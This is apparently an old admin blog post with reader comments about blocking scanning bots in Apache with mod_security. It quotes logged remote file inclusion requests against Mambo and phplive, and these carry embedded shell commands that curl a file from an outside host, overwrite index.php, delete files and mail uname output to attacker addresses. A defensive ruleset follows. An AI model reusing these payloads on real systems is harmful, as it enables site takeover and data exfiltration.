There has to be a way to hook Apache to catch the first of these and then drop requests from that client for some time period. modsecurity looks like a valid approach. Anyone actually use it?

1) /Mambo/index2.php?_REQUEST[option]=com_content &_REQUEST[Itemid]=1 &GLOBALS= &mosConfig_absolute_path=http://89.161.233.220.exetel.com.au/webmail/.cache? &cmd=cd+cache;curl -O http://89.161.233.220.exetel.com.au/webmail/.cache;mv cm index.php; rm -rf cm*;uname -a | mail -s 66.150.227.79/Mambo/_uname_i2 +ursu1cc@gmail.com;uname -a | mail -s uname_i2_66.150.227.79 politia112_inactiune@yahoo.com;echo|: 1 2) /cvs/index2.php?_REQUEST[option]=com_content &_REQUEST[Itemid]=1 &GLOBALS= &mosConfig_absolute_path=http://89.161.233.220.exetel.com.au/webmail/.cache? &cmd=cd+cache;curl -O http://89.161.233.220.exetel.com.au/webmail/.cache;mv cm index.php; rm -rf cm*;uname -a | mail -s 66.150.227.79/cvs/_uname_i2 +ursu1cc@gmail.com;uname -a | mail -s uname_i2_66.150.227.79 politia112_inactiune@yahoo.com;echo|: 1 3) /mambo/index2.php?_REQUEST[option]=com_content &_REQUEST[Itemid]=1 &GLOBALS= &mosConfig_absolute_path=http://89.161.233.220.exetel.com.au/webmail/.cache? &cmd=cd+cache;curl -O http://89.161.233.220.exetel.com.au/webmail/.cache;mv cm index.php; rm -rf cm*;uname -a | mail -s 66.150.227.79/mambo/_uname_i2 +ursu1cc@gmail.com;uname -a | mail -s uname_i2_66.150.227.79 politia112_inactiune@yahoo.com;echo|: 1 4) /administrator/components/com_remository/admin.remository.php? mosConfig_absolute_path=http://private.hacker.dj/1?/: 1 5) /phplive/setup/header.php?css_path=http://89.161.233.220.exetel.com.au/webmail/.cache? &cmd=uname -a | mail -s 66.150.227.79/phplive/setup/_uname_phplive+ursu1cc@gmail.com;uname -a | mail -s uname_phplive_66.150.227.79 politia112_inactiune@yahoo.com;echo|: 1

Update 2007-06-02:
I set up modsecurity2 with the following config file and ruleset to reject any scanning bots after the first php request.

LoadModule security2_module /usr/lib/apache2/modules/mod_security2.so <IfModule mod_security2.c> SecRuleEngine On # store session information SecDataDir /var/cache/apache2/modsecurity # let everything through, unless explicitly denied SecDefaultAction "log,pass,phase:2,status:503,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase" # use the remote host IP address as our session identifier SecRule REMOTE_HOST "." setsid:%{REMOTE_HOST},nolog # we don't have any PHP pages, so if someone asks for one, set their session score from 0 (default) to 1 # decrement their score by 1 every 300 seconds, so that they can try back later if they made a mistake. SecRule REQUEST_BASENAME "\.php$" log,deny,setvar:session.score=1,deprecatevar:session.score=1/300 # if session score is greater than or equal to 1, deny access # @ge because we may add other SecRules to increment the score SecRule SESSION:SCORE "@ge 1" "log,deny,msg:'In temporarily banned REMOTE_HOST list'" # remap our our professed software vendor SecServerSignature "OoO" # log only warnings, deny, drops SecAuditEngine RelevantOnly SecAuditLog "/var/log/apache2/security.log" </IfModule>

We did something with mod_security on a filtro box once. I don't recall which one. It did thwart some attempts but not all of them. You'll likely have to write your own regular expressions to keep up with the script kiddies, as the included ones didn't catch them all -- Nathan
That's handy, but I am not sure many people can get by without having some php running somewhere. Granted, that would be optimal though :) -- Nathan
Well, you can break it down by apache virtual host or Location, so it can get fine-grained. For ease of administration, one should probably stick to one framework per vhost. -- Patrick.
Very nice. I'm reading more about it now per your recommendation. A straight PHP filter probably won't work for me on most sites as I use Wordpress and I'm starting to play with CodeIgniter [php framework]. Still, just detecting attempted break-ins using standard vulnerabilities will be quite useful. -- Calvin.